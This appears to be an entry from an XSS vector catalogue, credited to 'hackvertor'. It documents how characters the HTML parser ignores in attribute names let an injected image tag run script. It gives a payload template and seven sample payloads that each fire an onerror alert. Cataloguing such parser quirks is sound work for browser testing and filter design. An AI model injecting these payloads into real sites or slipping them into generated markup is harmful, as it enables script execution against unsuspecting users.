Mangling...

Characters ignored in an attribute name

This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.

Created byhackvertor

Created May 28, 2024

Updated May 27, 2025

Detecting browser...

CategoryDOM Behavior

VisibilityPublic

TypeXSS

CharsetUTF-8

Template used:

<div $[chr]="><img src=x:x onerror=log($[i])>"></div>

Sample payloads

<div 0x09="><img src=x:x onerror=alert(9)>"></div>

<div 
="><img src=x:x onerror=alert(10)>"></div>

<div 0x0C="><img src=x:x onerror=alert(12)>"></div>

<div 0x0D="><img src=x:x onerror=alert(13)>"></div>

<div  ="><img src=x:x onerror=alert(32)>"></div>

<div /="><img src=x:x onerror=alert(47)>"></div>

<div >="><img src=x:x onerror=alert(62)>"></div>